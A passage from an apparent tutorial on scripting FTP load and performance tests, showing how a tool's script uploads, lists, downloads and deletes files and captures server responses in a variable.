      ftp.data = readFile("users.csv");  
      action(ftp, op, "put", "tmp.txt");  
 }  
     Pretty obvious, isn't it?   Note that in the above script, the variable "ftp.data" holds the data to be sent to ftp server.  You can dynamically generate the data if you want.

    The operations "ls" and "get" are even simpler:
 action(ftp, op, "ls");   
 //ftp.recvedData will hold the output of "ls".  

 action(ftp, op, "get", "tmp.txt");   
 //ftp.recvedData will hold the output of content of remote file "tmp.txt"  
    What's interesting here is,  after the operation, the variable "ftp.recvedData" will hold the output of the operation. In the case of the "ls" operation, it's the directory listing, in the case of the "get" operation, it's the content of the downloaded file.  You can do all the operations on this variable, such as, use regexp to grab certain fields and use them in the next ftp operations.

    Of course, the following operations are supported.  They are fairly straight forward.
action(ftp, op, "del", "temp.txt"); 

action(ftp, op, "bye"); 

action(ftp, op, "pwd"); 

     FTP lost to HTTP because ftp is simpler than HTTP - it doesn't have the fancy extensions of HTTP.   So let's keep performance testing on FTP simple too.